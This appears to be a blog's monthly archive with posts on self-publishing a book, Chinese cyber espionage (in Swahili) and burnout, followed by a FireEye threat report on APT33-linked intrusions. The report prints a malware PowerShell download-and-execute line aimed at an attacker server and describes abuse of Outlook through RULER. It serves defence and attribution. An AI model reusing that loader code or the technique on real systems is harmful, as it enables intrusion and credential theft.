Monthly Archives: December 2018

Notes on Self-Publishing a Book


In this post I would like to share a few thoughts on self-publishing a book, in case anyone is considering that option.

As I mentioned in my post on burnout, one of my goals was to publish a book on a subject other than cyber security. A friend from my Krav Maga school, Anna Wonsley, learned that I had published several books, and asked if we might collaborate on a book about stretching. The timing was right, so I agreed.

I published my first book with Pearson and Addison-Wesley in 2004, and my last with No Starch in 2013. 14 years is an eternity in the publishing world, and even in the last 5 years the economics and structure of book publishing have changed quite a bit.

To better understand the changes, I had dinner with one of the finest technical authors around, Michael W. Lucas. We met prior to my interest in this book, because I had wondered about publishing books on my own. MWL started in traditional publishing like me, but has since become a full-time author and independent publisher. He explained the pros and cons of going it alone, which I carefully considered.

By the end of 2017, Anna and I were ready to begin work on the book. I believe our first "commits" occurred in December 2017.

For this stretching book project, I knew my strengths included organization, project management, writing to express another person's message, editing, and access to a skilled lead photographer. I learned that my co-author's strengths included subject matter expertise, a willingness to be photographed for the book's many pictures, and friends who would also be willing to be photographed.

None of us was very familiar with the process of transforming a raw manuscript and photos into a finished product. When I had published with Pearson and No Starch, they took care of that process, as well as copy-editing.

Beyond turning manuscript and photos into a book, I also had to identify a publication platform. Early on we decided to self-publish using one of the many newer companies offering that service. We wanted a company that could get our book into Amazon, and possibly physical book stores as well. We did not want to try working with a traditional publisher, as we felt that we could manage most aspects of the publishing process ourselves, and augment with specialized help where needed.

After a lot of research we chose Blurb. One of the most attractive aspects of Blurb was their expert ecosystem. We decided that we would hire one of these experts to handle the interior layout process. We contacted Jennifer Linney, who happened to be local and had experience publishing books to Amazon. We met in person, discussed the project, and agreed to move forward together.

I designed the structure of the book. As a former Air Force officer, I was comfortable with the "rule of threes," and brought some recent writing experience from my abandoned PhD thesis.

I designed the book to have an introduction, the main content, and a conclusion. Within the main content, the book featured an introduction and physical assessment, three main sections, and a conclusion. The three main sections consisted of a fundamental stretching routine, an advanced stretching routine, and a performance enhancement section -- something with Indian clubs, or kettle bells, or another supplement to stretching.

Anna designed all of the stretching routines and provided the vast majority of the content. She decided to focus on three physical problem areas -- tight hips, shoulders/back, and hamstrings. We encouraged the reader to "reach three goals" -- open your hips, expand your shoulders, and touch your toes. Anna designed exercises that worked in a progression through the body, incorporating her expertise as a certified trainer and professional martial arts instructor.

Initially we tried a process whereby she would write section drafts, and I would edit them, all using Google Docs. This did not work as well as we had hoped, and we spent a lot of time stalled in virtual collaboration.

By the spring of 2018 we decided to try meeting in person on a regular basis. Anna would explain her desired content for a section, and we would take draft photographs using iPhones to serve as placeholders and to test the feasibility of real content. We made a lot more progress using these methods, although we stalled again mid-year due to schedule conflicts.

By October our text was ready enough to try taking book-ready photographs. We bought photography lights from Amazon and used my renovated basement game room as a studio. We took pictures over three sessions, with Anna and her friend Josh as subjects. I spent several days editing the photos to prepare for publication, then handed the bundled manuscript and photographs to Jennifer for a light copy-edit and layout during November.

Our goal was to have the book published before the end of the year, and we met that goal. We decided to offer two versions. The first is a "collector's edition" featuring all color photographs, available exclusively via Blurb as Reach Your Goal: Collector's Edition. The second will be available at Amazon in January, and will feature black and white photographs.

While we were able to set the price of the book directly via Blurb, we could basically only suggest a price to Ingram and hence to Amazon. Ingram is the distributor that feeds Amazon and physical book stores. I am curious to see how the book will appear in those retail locations, and how much it will cost readers. We tried to price it competitively with older stretching books of similar size. (Ours is 176 pages with over 200 photographs.)

Without revealing too much of the economic structure, I can say that it's much cheaper to sell directly from Blurb. Their cost structure allows us to price the full color edition competitively. However, one of our goals was to provide our book through Amazon, and to keep the price reasonable we had to sell the black and white edition outside of Blurb.

Overall I am very pleased with the writing process, and exceptionally happy with the book itself. The color edition is gorgeous and the black and white version is awesome too.

The only change I would have made to the writing process would have been to start the in-person collaboration from the beginning. Working together in person accelerated the transfer of ideas to paper and played to our individual strengths of Anna as subject matter expert and me as a writer.

In general, I would not recommend self-publishing if you are not a strong writer. If writing is not your forte, then I highly suggest you work with a traditional publisher, or contract with an editor. I have seen too many self-published books that read terribly. This usually happens when the author is a subject matter expert, but has trouble expressing ideas in written form.

The bottom line is that it's never been easier to make your dream of writing a book come true. There are options for everyone, and you can leverage them to create wonderful products that scale with demand and can really help your audience reach their goals!

If you want to start the new year with better flexibility and fitness, consider taking a look at our book on Blurb! When the Amazon edition is available I will update this post with a link.

Update: Here is the Amazon listing.

Cross-posted from Rejoining the Tao Blog.

SHUTMA ZA UJASUSI MTANDANO DHIDI YA UCHINA



KWA UFUPI: Australia, Marekani na Uingereza zimeitupia lawana nchi ya Uchina kuhusika na ujasusi mtandao katika mataifa yao na mataifa Rafiki – Shutma ambazo zime eleza uchina kuhusika na wizi wa taarifa za siri za kibiashara za serikali na makampuni ya Teknologia.
---------------------------
Niliwahi kueleza mara kadhaa mwelekeo mpya na hatari wa Uhalifu mtandao ambapo nilitahadharisha kuhusiana na vita mtandao (Cyber Warfare) pamoja na Ujasusi Mtandao (Cyber Espionage) ambavyo kwa sasa mataifa makubwa yanawekeza zaidi kwenye matumizi ya teknolojia kudhuru na kuingilia mataifa mengine kimtandao.

Kundi la APT-10 la uchina limeshutumiwa na Uingereza na Marekani kuingilia makampuni takriban 45 ya Teknolojia, Taarifa za wafanyakazi takriban laki moja za wanajeshi wa majini wa marekani pamoja na computer mbali mbali za shirika la NASA.



Zhu Hua pamoja na Zhang Shilong, ambao ni raia wa Uchina wameshtakiwa na Marekani kuhusika na kufanya mashambulizi mtandao kwaniaba ya wizara ya ulinzi ya uchina (Chinese Ministry of State Security) – Naibu Mwanashria mkuu wa Marekani , Bwana  Rod Rosenstein alielezea shutma hizo.


Uchina imekana kuhusika na shutma zinazotolewa dhidi yake na marekani pamoja na uingereza huku ikiitaka marekani kuwaachia raia wake wawili – Shutma ambazo  zimeelezwa athari zake zimekumba nchi nyingine takriban 12 ikiwemo Nchi ya Brazil, Japan, Ufaransa, Canada na Nyinginezo.

Aidha, Kumekua na shutma mfano wa hizi kutokea taifa moje dhidi ya Jingine ambapo Mataifa kama Urusi, Korea ya Kaskazini, Marekani, Uingereza, na Uchina zimekua zikitwajwa zaidi kua na tabia ya ujasusi mtandao – Huku ikionekana mataifa hayo yakiongeza nguvu na kujiimarisha kua na uwezo mkumbwa wa kufanya mashambulizi mtandao kwa mataifa mengine.



Sanjari na hili, tumeona ukuaji mkubwa makampuni kutoa huduma za kiuhalifu mtandao kama vile “Malware – as –a service”, “Ransomware – as – a service” na “Cyberattacks on demand” jambo ambalo limepelekea uhalifu mtandao kuendelea kushika kasi maeneo mengi duniani.

Hivi karibuni, Shirika la Kipelelezi la marekani (FBI) limefungia makampuni kadhaa yanayo jihusisha na huduma za kutoa msaada wa mashambulizi mtandao kwa wateja wake.

FBI, imeeleza makampuni yaliyo fungiwa yamekua yakijihusisha na huduma za kushambulia mashirika ya kifedha, Mashule, wakala wa serikali, watoa huduma za kimtandao nakadhalika.

critical-boot.com, ragebooter.com, downthem.org, and quantumstress.net ni baadhi tu ya waliokumbana na zilzala ya funga funga iliyofanywa na shirika la kipelezi la marekani (FBI) baada ya oparesheni kubwa kufanyika dhidi ya makampuni yanayo jihusisha na huduma za kihalifu mtandao.



Aidha, Katika kipindi hiki cha sikukuu za mwisho wa mwaka takwimu zimekua zikionyesha uhalifu mtandao unakua kwa kasi, na tumekua tukishuhudia matukio mengi ya kihalifu mtandao yanayopelekea upetevu mkubwa wa pesa na taafifa za watu binafsi pamoja na makampuni mbali mbali.

Nikitokea mfano kwa mataifa yetu ya Afrika mashariki, Nchini Kenya kwa mujibu wa takwimu zilizo tolewa na “Communications Authority of Kenya (CA)”, imeelezwa kubainika matukio ya kihalifu mtandao zaidi ya Milioni 3.8 kwa kipindi cha miezi mitatu pekee. Taarifa za Kina Juu ya hili zimechapishwa na "STANDARD MEDIA" ya Kenya.

Nitumie Fursa hii, Kushauri umakini zaidi wakati wa kutumia mitandao hususan huduma za kibenki za kimtandao na kuimarisha zaidi ulinzi wa mifumo yetu ya kimtandao ili kupunguza ukubwa wa tatizo.

Managing Burnout

This is not strictly an information security post, but the topic likely affects a decent proportion of my readership.

Within the last few years I experienced a profound professional "burnout." I've privately mentioned this to colleagues in the industry, and heard similar stories or requests for advice on how to handle burnout.

I want to share my story in the hopes that it helps others in the security scene, either by coping with existing burnout or preparing for a possible burnout.

How did burnout manifest for me? It began with FireEye's acquisition of Mandiant, almost exactly five years ago. 2013 was a big year for Mandiant, starting with the APT1 report in early 2013 and concluding with the acquisition in December.

The prospect of becoming part of a Silicon Valley software company initially seemed exciting, because we would presumably have greater resources to battle intruders. Soon, however, I found myself at odds with FireEye's culture and managerial habits, and I wondered what I was doing inside such a different company.

(It's important to note that the appointment of Kevin Mandia as CEO in June 2016 began a cultural and managerial shift. I give Kevin and his lieutenants credit for helping transform the company since then. Kevin's appointment was too late for me, but I applaud the work he has done over the last few years.)

Starting in late 2014 and progressing in 2015, I became less interested in security. I was aggravated every time I saw the same old topics arise in social or public media. I did not see the point of continuing to debate issues which were never solved. I was demoralized and frustrated.

At this time I was also working on my PhD with King's College London. I had added this stress myself, but I felt like I could manage it. I had earned two major and two minor degrees in four years as an Air Force Academy cadet. Surely I could write a thesis!

Late in 2015 I realized that I needed to balance the very cerebral art of information security with a more physical activity. I took a Krav Maga class the first week of January 2016. It was invigorating and I began a new blog, Rejoining the Tao, that month. I began to consider options outside of informations security.

In early 2016 my wife began considering ways to rejoin the W-2 workforce, after having stayed home with our kids for 12 years. We discussed the possibility of me leaving my W-2 job and taking a primary role with the kids. By mid-2016 she had a new job and I was open to departing FireEye.

By late 2016 I also realized that I was not cut out to be a PhD candidate. Although I had written several books, I did not have the right mindset or attitude to continue writing my thesis. After two years I quit my PhD program. This was the first time I had quit anything significant in my life, and it was the right decision for me. (The Churchill "never, never, never give up" speech is fine advice when defending your nation's existence, but it's stupid advice if you're not happy with the path you're following.)

In March 2017 I posted Bejtlich Moves On, where I said I was leaving FireEye. I would offer security consulting in the short term, and would open a Krav Maga school in the long-term. This was my break with the security community and I was happy to make it. I blogged on security only five more times in 2017.

(Incidentally, one very public metric for my burnout experience can be seen in my blog output. In 2015 I posted 55 articles, but in 2016 I posted only 8, and slightly more, 12, in 2017. This is my 21st post of 2018.)

I basically took a year off from information security. I did some limited consulting, but Mrs B paid the bills, with some support from my book royalties and consulting. This break had a very positive effect on my mental health. I stayed aware of security developments through Twitter, but I refused to speak to reporters and did not entertain job offers.

During this period I decided that I did not want to open a Krav Maga school and quit my school's instructor development program. For the second time, I had quit something I had once considered very important.

I started a new project, though -- writing a book that had nothing to do with information security. I will post about it shortly, as I am finalizing the cover with the layout team this weekend!

By the spring of 2018 I was able to consider returning to security. In May I blogged that I was joining Splunk, but that lasted only two months. I realized I had walked into another cultural and managerial mismatch. Near the end of that period, Seth Hall from Corelight contacted me, and by July 20th I was working there. We kept it quiet until September. I have been very happy at Corelight, finally finding an environment that matches my temperament, values, and interests.

My advice to those of you who have made it this far:

If you're feeling burnout now, you're not alone. It happens. We work in a stressful industry that will take everything that you can give, and then try to take more. It's healthy and beneficial to push back. If you can, take a break, even if it means only a partial break.

Even if you can't take a break, consider integrating non-security activities into your lifestyle -- the more physical, the better. Security is a very cerebral activity, often performed in a sedentary manner. You have a body and taking care of it will make your mind happier too.

If you're not feeling burnout now, I recommend preparing for a possible burnout in the future. In addition to the advice in the previous paragraphs, take steps now to be able to completely step away from security for a defined period. Save a proportion of your income to pay your bills when you're not working in security. I recommend at least a month, but up to six months if you can manage it.

This is good financial advice anyway, in the event you were to lose your job. This is not an emergency fund, though -- this is a planned reprieve from burnout. We are blessed in security to make above-average salaries, so I suggest saving for retirement, saving for layoffs, and saving for burnout.

Finally, it's ok to talk to other people about this. This will likely be a private conversation. I don't see too many people saying "I'm burned out!" on Twitter or in a blog post. I only felt comfortable writing this post months after I returned to regular security work.

I'm very interested in hearing what others have to say on this topic. Replying to my Twitter announcement for the blog post is probably the easiest step. I moderate the comments here and might not get to them in a timely manner.

OVERRULED: Containing a Potentially Destructive Adversary

Introduction

FireEye assesses APT33 may be behind a series of intrusions and attempted intrusions within the engineering industry. Public reporting indicates this activity may be related to recent destructive attacks. FireEye's Managed Defense has responded to and contained numerous intrusions that we assess are related. The actor is leveraging publicly available tools in early phases of the intrusion; however, we have observed them transition to custom implants in later stage activity in an attempt to circumvent our detection.

On Sept. 20, 2017, FireEye Intelligence published a blog post detailing spear phishing activity targeting Energy and Aerospace industries. Recent public reporting indicated possible links between the confirmed APT33 spear phishing and destructive SHAMOON attacks; however, we were unable to independently verify this claim. FireEye’s Advanced Practices team leverages telemetry and aggressive proactive operations to maintain visibility of APT33 and their attempted intrusions against our customers. These efforts enabled us to establish an operational timeline that was consistent with multiple intrusions Managed Defense identified and contained prior to the actor completing their mission. We correlated the intrusions using an internally-developed similarity engine described below. Additionally, public discussions have also indicated that specific attacker infrastructure we observed is possibly related to the recent destructive SHAMOON attacks.

Identifying the Overlap in Threat Activity

FireEye augments our expertise with an internally-developed similarity engine to evaluate potential associations and relationships between groups and activity. Using concepts from document clustering and topic modeling literature, this engine provides a framework to calculate and discover similarities between groups of activities, and then develop investigative leads for follow-on analysis. Our engine identified similarities between a series of intrusions within the engineering industry. The near real-time results led to an in-depth comparative analysis. FireEye analyzed all available organic information from numerous intrusions and all known APT33 activity. We subsequently concluded, with medium confidence, that two specific early-phase intrusions were the work of a single group. Advanced Practices then reconstructed an operational timeline based on confirmed APT33 activity observed in the last year. We compared that to the timeline of the contained intrusions and determined there were circumstantial overlaps to include remarkable similarities in tool selection during specified timeframes. We assess with low confidence that the intrusions were conducted by APT33. This blog contains original source material only, whereas Finished Intelligence including an all-source analysis is available within our intelligence portal. To best understand the techniques employed by the adversary, it is necessary to provide background on our Managed Defense response to this activity during their 24x7 monitoring.

Managed Defense Rapid Responses: Investigating the Attacker

In mid-November 2017, Managed Defense identified and responded to targeted threat activity at a customer within the engineering industry. The adversary leveraged stolen credentials and a publicly available tool, SensePost’s RULER, to configure a client-side mail rule crafted to download and execute a malicious payload from an adversary-controlled WebDAV server 85.206.161[.]214@443\outlook\live.exe (MD5: 95f3bea43338addc1ad951cd2d42eb6f).

The payload was an AutoIT downloader that retrieved and executed additional PowerShell from hxxps://85.206.161[.]216:8080/HomePage.htm. The follow-on PowerShell profiled the target system’s architecture, downloaded the appropriate variant of PowerSploit (MD5: c326f156657d1c41a9c387415bf779d4 or 0564706ec38d15e981f71eaf474d0ab8), and reflectively loaded PUPYRAT (MD5: 94cd86a0a4d747472c2b3f1bc3279d77 or 17587668AC577FCE0B278420B8EB72AC). The actor leveraged a publicly available exploit for CVE-2017-0213 to escalate privileges, publicly available Windows SysInternals PROCDUMP to dump the LSASS process, and publicly available MIMIKATZ to presumably steal additional credentials. Managed Defense aided the victim in containing the intrusion.

FireEye collected 168 PUPYRAT samples for a comparison. While import hashes (IMPHASH) are insufficient for attribution, we found it remarkable that out of the specified sampling, the actor’s IMPHASH was found in only six samples, two of which were confirmed to belong to the threat actor observed in Managed Defense, and one which is attributed to APT33. We also determined APT33 likely transitioned from PowerShell EMPIRE to PUPYRAT during this timeframe.

In mid-July of 2018, Managed Defense identified similar targeted threat activity focused against the same industry. The actor leveraged stolen credentials and RULER’s module that exploits CVE-2017-11774 (RULER.HOMEPAGE), modifying numerous users’ Outlook client homepages for code execution and persistence. These methods are further explored in this post in the "RULER In-The-Wild" section.

The actor leveraged this persistence mechanism to download and execute OS-dependent variants of the publicly available .NET POSHC2 backdoor as well as a newly identified PowerShell-based implant self-named POWERTON. Managed Defense rapidly engaged and successfully contained the intrusion. Of note, Advanced Practices separately established that APT33 began using POSHC2 as of at least July 2, 2018, and continued to use it throughout the duration of 2018.

During the July activity, Managed Defense observed three variations of the homepage exploit hosted at hxxp://91.235.116[.]212/index.html. One example is shown in Figure 1.


Figure 1: Attacker’s homepage exploit (CVE-2017-11774)

The main encoded payload within each exploit leveraged WMIC to conduct system profiling in order to determine the appropriate OS-dependent POSHC2 implant and dropped to disk a PowerShell script named “Media.ps1” within the user’s %LOCALAPPDATA% directory (%LOCALAPPDATA%\MediaWs\Media.ps1) as shown in Figure 2.


Figure 2: Attacker’s “Media.ps1” script

The purpose of “Media.ps1” was to decode and execute the downloaded binary payload, which was written to disk as “C:\Users\Public\Downloads\log.dat”. At a later stage, this PowerShell script would be configured to persist on the host via a registry Run key.

Analysis of the “log.dat” payloads determined them to be variants of the publicly available POSHC2 proxy-aware stager written to download and execute PowerShell payloads from a hardcoded command and control (C2) address. These particular POSHC2 samples run on the .NET framework and dynamically load payloads from Base64 encoded strings. The implant will send a reconnaissance report via HTTP to the C2 server (hxxps://51.254.71[.]223/images/static/content/) and subsequently evaluate the response as PowerShell source code. The reconnaissance report contains the following information:

  • Username and domain
  • Computer name
  • CPU details
  • Current exe PID
  • Configured C2 server

The C2 messages are encrypted via AES using a hardcoded key and encoded with Base64. It is this POSHC2 binary that established persistence for the aforementioned “Media.ps1” PowerShell script, which then decodes and executes the POSHC2 binary upon system startup. During the identified July 2018 activity, the POSHC2 variants were configured with a kill date of July 29, 2018.

POSHC2 was leveraged to download and execute a new PowerShell-based implant self-named POWERTON (hxxps://185.161.209[.]172/api/info). The adversary had limited success with interacting with POWERTON during this time.  The actor was able to download and establish persistence for an AutoIt binary named “ClouldPackage.exe” (MD5: 46038aa5b21b940099b0db413fa62687), which was achieved via the POWERTON “persist” command. The sole functionality of “ClouldPackage.exe” was to execute the following line of PowerShell code:

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; $webclient = new-object System.Net.WebClient; $webclient.Credentials = new-object System.Net.NetworkCredential('public', 'fN^4zJp{5w#K0VUm}Z_a!QXr*]&2j8Ye'); iex $webclient.DownloadString('hxxps://185.161.209[.]172/api/default')

The purpose of this code is to retrieve “silent mode” POWERTON from the C2 server. Note the actor protected their follow-on payloads with strong credentials. Shortly after this, Managed Defense contained the intrusion.

Starting approximately three weeks later, the actor reestablished access through a successful password spray. Managed Defense immediately identified the actor deploying malicious homepages with RULER to persist on workstations. They made some infrastructure and tooling changes to include additional layers of obfuscation in an attempt to avoid detection. The actor hosted their homepage exploit at a new C2 server (hxxp://5.79.66[.]241/index.html). At least three new variations of “index.html” were identified during this period. Two of these variations contained encoded PowerShell code written to download new OS-dependent variants of the .NET POSHC2 binaries, as seen in Figure 3.


Figure 3: OS-specific POSHC2 Downloader

Figure 3 shows that the actor made some minor changes, such as encoding the PowerShell "DownloadString" commands and renaming the resulting POSHC2 and .ps1 files dropped to disk. Once decoded, the commands will attempt to download the POSHC2 binaries from yet another new C2 server (hxxp://103.236.149[.]124/delivered.dat). The name of the .ps1 file dropped to decode and execute the POSHC2 variant also changed to “Vision.ps1”.  During this August 2018 activity, the POSHC2 variants were configured with a “kill date” of Aug. 13, 2018. Note that POSHC2 supports a kill date in order to guardrail an intrusion by time and this functionality is built into the framework.

Once again, POSHC2 was used to download a new variant of POWERTON (MD5: c38069d0bc79acdc28af3820c1123e53), configured to communicate with the C2 domain hxxps://basepack[.]org. At one point in late-August, after the POSHC2 kill date, the adversary used RULER.HOMEPAGE to directly download POWERTON, bypassing the intermediary stages previously observed.

Due to Managed Defense’s early containment of these intrusions, we were unable to ascertain the actor’s motivations; however, it was clear they were adamant about gaining and maintaining access to the victim’s network.

Adversary Pursuit: Infrastructure Monitoring

Advanced Practices conducts aggressive proactive operations in order to identify and monitor adversary infrastructure at scale. The adversary maintained a RULER.HOMEPAGE payload at hxxp://91.235.116[.]212/index.html between July 16 and Oct. 11, 2018. On at least Oct. 11, 2018, the adversary changed the payload (MD5: 8be06571e915ae3f76901d52068e3498) to download and execute a POWERTON sample from hxxps://103.236.149[.]100/api/info (MD5: 4047e238bbcec147f8b97d849ef40ce5). This specific URL was identified in a public discussion as possibly related to recent destructive attacks. We are unable to independently verify this correlation with any organic information we possess.

On Dec. 13, 2018, Advanced Practices proactively identified and attributed a malicious RULER.HOMEPAGE payload hosted at hxxp://89.45.35[.]235/index.html (MD5: f0fe6e9dde998907af76d91ba8f68a05). The payload was crafted to download and execute POWERTON hosted at hxxps://staffmusic[.]org/transfer/view (MD5: 53ae59ed03fa5df3bf738bc0775a91d9).

Table 1 contains the operational timeline for the activity we analyzed.

DATE/TIME (UTC)

NOTE

INDICATOR

2017-08-15 17:06:59

APT33 – EMPIRE (Used)

8a99624d224ab3378598b9895660c890

2017-09-15 16:49:59

APT33 – PUPYRAT (Compiled)

4b19bccc25750f49c2c1bb462509f84e

2017-11-12 20:42:43

GroupA – AUT2EXE Downloader (Compiled)

95f3bea43338addc1ad951cd2d42eb6f

2017-11-14 14:55:14

GroupA – PUPYRAT (Used)

17587668ac577fce0b278420b8eb72ac

2018-01-09 19:15:16

APT33 – PUPYRAT (Compiled)

56f5891f065494fdbb2693cfc9bce9ae

2018-02-13 13:35:06

APT33 – PUPYRAT (Used)

56f5891f065494fdbb2693cfc9bce9ae

2018-05-09 18:28:43

GroupB – AUT2EXE (Compiled)

46038aa5b21b940099b0db413fa62687

2018-07-02 07:57:40

APT33 – POSHC2 (Used)

fa7790abe9ee40556fb3c5524388de0b

2018-07-16 00:33:01

GroupB – POSHC2 (Compiled)

75e680d5fddbdb989812c7ba83e7c425

2018-07-16 01:39:58

GroupB – POSHC2 (Used)

75e680d5fddbdb989812c7ba83e7c425

2018-07-16 08:36:13

GroupB – POWERTON (Used)

46038aa5b21b940099b0db413fa62687

2018-07-31 22:09:25

APT33 – POSHC2 (Used)

129c296c363b6d9da0102aa03878ca7f

2018-08-06 16:27:05

GroupB – POSHC2 (Compiled)

fca0ad319bf8e63431eb468603d50eff

2018-08-07 05:10:05

GroupB – POSHC2 (Used)

75e680d5fddbdb989812c7ba83e7c425

2018-08-29 18:14:18

APT33 – POSHC2 (Used)

5832f708fd860c88cbdc088acecec4ea

2018-10-09 16:02:55

APT33 – POSHC2 (Used)

8d3fe1973183e1d3b0dbec31be8ee9dd

2018-10-09 16:48:09

APT33 – POSHC2 (Used)

48d1ed9870ed40c224e50a11bf3523f8

2018-10-11 21:29:22

GroupB – POWERTON (Used)

8be06571e915ae3f76901d52068e3498

2018-12-13 11:00:00

GroupB – POWERTON (Identified)

99649d58c0d502b2dfada02124b1504c

Table 1: Operational Timeline

Outlook and Implications

If the activities observed during these intrusions are linked to APT33, it would suggest that APT33 has likely maintained proprietary capabilities we had not previously observed until sustained pressure from Managed Defense forced their use. FireEye Intelligence has previously reported that APT33 has ties to destructive malware, and they pose a heightened risk to critical infrastructure. This risk is pronounced in the energy sector, which we consistently observe them target. That targeting aligns with Iranian national priorities for economic growth and competitive advantage, especially relating to petrochemical production.

We will continue to track these clusters independently until we achieve high confidence that they are the same. The operators behind each of the described intrusions are using publicly available but not widely understood tools and techniques in addition to proprietary implants as needed. Managed Defense has the privilege of being exposed to intrusion activity every day across a wide spectrum of industries and adversaries. This daily front line experience is backed by Advanced Practices, FireEye Labs Advanced Reverse Engineering (FLARE), and FireEye Intelligence to give our clients every advantage they can have against sophisticated adversaries. We welcome additional original source information we can evaluate to confirm or refute our analytical judgements on attribution.

Custom Backdoor: POWERTON

POWERTON is a backdoor written in PowerShell; FireEye has not yet identified any publicly available toolset with a similar code base, indicating that it is likely custom-built. POWERTON is designed to support multiple persistence mechanisms, including WMI and auto-run registry key. Communications with the C2 are over TCP/HTTP(S) and leverage AES encryption for communication traffic to and from the C2. POWERTON typically gets deployed as a later stage backdoor and is obfuscated several layers.

FireEye has witnessed at least two separate versions of POWERTON, tracked separately as POWERTON.v1 and POWERTON.v2, wherein the latter has improved its command and control functionality, and integrated the ability to dump password hashes.

Table 2 contains samples of POWERTON.

Hash of Obfuscated File (MD5)

Hash of Deobfuscated File (MD5)

Version

974b999186ff434bee3ab6d61411731f

3871aac486ba79215f2155f32d581dc2

V1

e2d60bb6e3e67591e13b6a8178d89736

2cd286711151efb61a15e2e11736d7d2

V1

bd80fcf5e70a0677ba94b3f7c011440e

5a66480e100d4f14e12fceb60e91371d

V1

4047e238bbcec147f8b97d849ef40ce5

f5ac89d406e698e169ba34fea59a780e

V2

c38069d0bc79acdc28af3820c1123e53

4aca006b9afe85b1f11314b39ee270f7

V2

N/A

7f4f7e307a11f121d8659ca98bc8ba56

V2

53ae59ed03fa5df3bf738bc0775a91d9

99649d58c0d502b2dfada02124b1504c

V2

Table 2: POWERTON malware samples

Adversary Methods: Email Exploitation on the Rise

Outlook and Exchange are ubiquitous with the concept of email access. User convenience is a primary driver behind technological advancements, but convenient access for users often reveals additional attack surface for adversaries. As organizations expose any email server access to the public internet for its users, those systems become intrusion vectors. FireEye has observed an increase in targeted adversaries challenging and subverting security controls on Exchange and Office365. Our Mandiant consultants also presented several new methods used by adversaries to subvert multifactor authentication at FireEye Cyber Defense Summit 2018.

At FireEye, our decisions are data driven, but data provided to us is often incomplete and missing pieces must be inferred based on our expertise in order for us to respond to intrusions effectively. A plausible scenario for exploitation of this vector is as follows.

An adversary has a single pair of valid credentials for a user within your organization obtained through any means, to include the following non-exhaustive examples:

  • Third party breaches where your users have re-used credentials; does your enterprise leverage a naming standard for email addresses such as first.last@yourorganization.tld? It is possible that a user within your organization has a personal email address with a first and last name--and an affiliated password--compromised in a third-party breach somewhere. Did they re-use that password?
  • Previous compromise within your organization where credentials were compromised but not identified or reset.
  • Poor password choice or password security policies resulting in brute-forced credentials.
  • Gathering of crackable password hashes from various other sources, such as NTLM hashes gathered via documents intended to phish them from users.
  • Credential harvesting phishing scams, where harvested credentials may be sold, re-used, or documented permanently elsewhere on the internet.

Once the adversary has legitimate credentials, they identify publicly accessible Outlook Web Access (OWA) or Office 365 that is not protected with multi-factor authentication. The adversary leverages the stolen credentials and a tool like RULER to deliver exploits through Exchange’s legitimate features.

RULER In-The-Wild: Here, There, and Everywhere

SensePost’s RULER is a tool designed to interact with Exchange servers via a messaging application programming interface (MAPI), or via remote procedure calls (RPC), both over HTTP protocol. As detailed in the "Managed Defense Rapid Responses" section, in mid-November 2017, FireEye witnessed network activity generated by an existing Outlook email client process on a single host, indicating connection via Web Distributed Authoring and Versioning (WebDAV) to an adversary-controlled IP address 85.206.161[.]214. This communication retrieved an executable created with Aut2Exe (MD5: 95f3bea43338addc1ad951cd2d42eb6f), and executed a PowerShell one-liner to retrieve further malicious content.

Without the requisite logging from the impacted mailbox, we can still assess that this activity was the result of a malicious mail rule created using the aforementioned tooling for the following reasons:

  • Outlook.exe directly requested the malicious executable hosted at the adversary IP address over WebDAV. This is unexpected unless some feature of Outlook directly was exploited; traditional vectors like phishing would show a process ancestry where Outlook spawned a child process of an Office product, Acrobat, or something similar. Process injection would imply prior malicious code execution on the host, which evidence did not support.
  • The transfer of 95f3bea43338addc1ad951cd2d42eb6f was over WebDAV. RULER facilitates this by exposing a simple WebDAV server, and a command line module for creating a client-side mail rule to point at that WebDAV hosted payload.
  • The choice of WebDAV for this initial transfer of stager is the result of restrictions in mail rule creation; the payload must be "locally" accessible before the rule can be saved, meaning protocol handlers for something like HTTP or FTP are not permitted. This is thoroughly detailed in Silent Break Security's initial write-up prior to RULER’s creation. This leaves SMB and WebDAV via UNC file pathing as the available options for transferring your malicious payload via an Outlook Rule. WebDAV is likely the less alerting option from a networking perspective, as one is more likely to find WebDAV transactions occurring over ports 80 and 443 to the internet than they are to find a domain joined host communicating via SMB to a non-domain joined host at an arbitrary IP address.
  • The payload to be executed via Outlook client-side mail rule must contain no arguments, which is likely why a compiled Aut2exe executable was chosen. 95f3bea43338addc1ad951cd2d42eb6f does nothing but execute a PowerShell one-liner to retrieve additional malicious content for execution. However, execution of this command natively using an Outlook rule was not possible due to this limitation.

With that in mind, the initial infection vector is illustrated in Figure 4.


Figure 4: Initial infection vector

As both attackers and defenders continue to explore email security, publicly-released techniques and exploits are quickly adopted. SensePost's identification and responsible disclosure of CVE-2017-11774 was no different. For an excellent description of abusing Outlook's home page for shell and persistence from an attacker’s perspective, refer to SensePost's blog.

FireEye has observed and documented an uptick in several malicious attackers' usage of this specific home page exploitation technique. Based on our experience, this particular method may be more successful due to defenders misinterpreting artifacts and focusing on incorrect mitigations. This is understandable, as some defenders may first learn of successful CVE-2017-11774 exploitation when observing Outlook spawning processes resulting in malicious code execution. When this observation is combined with standalone forensic artifacts that may look similar to malicious HTML Application (.hta) attachments, the evidence may be misinterpreted as initial infection via a phishing email. This incorrect assumption overlooks the fact that attackers require valid credentials to deploy CVE-2017-11774, and thus the scope of the compromise may be greater than individual users' Outlook clients where home page persistence is discovered. To assist defenders, we're including a Yara rule to differentiate these Outlook home page payloads at the end of this post.

Understanding this nuance further highlights the exposure to this technique when combined with password spraying as documented with this attacker, and underscores the importance of layered email security defenses, including multi-factor authentication and patch management. We recommend the organizations reduce their email attack surface as much as possible. Of note, organizations that choose to host their email with a cloud service provider must still ensure the software clients used to access that server are patched. Beyond implementing multi-factor authentication for Outlook 365/Exchange access, the Microsoft security updates in Table 3 will assist in mitigating known and documented attack vectors that are exposed for exploitation by toolkits such as SensePost’s RULER.

Microsoft Outlook Security Update

RULER Module Addressed

June 13, 2017 Security Update

RULER.RULES

September 12, 2017 Security Update

RULER.FORMS

October 10, 2017 Security Update

RULER.HOMEPAGE

Table 3: Outlook attack surface mitigations

Detecting the Techniques

FireEye detected this activity across our platform, including named detection for POSHC2, PUPYRAT, and POWERTON. Table 4 contains several specific detection names that applied to the email exploitation and initial infection activity.

PLATFORM

SIGNATURE NAME

Endpoint Security

POWERSHELL ENCODED REMOTE DOWNLOAD (METHODOLOGY)
SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)
MIMIKATZ (CREDENTIAL STEALER)
RULER OUTLOOK PERSISTENCE (UTILITY)

Network and Email Security

FE_Exploit_HTML_CVE201711774
FE_HackTool_Win_RULER
FE_HackTool_Linux_RULER
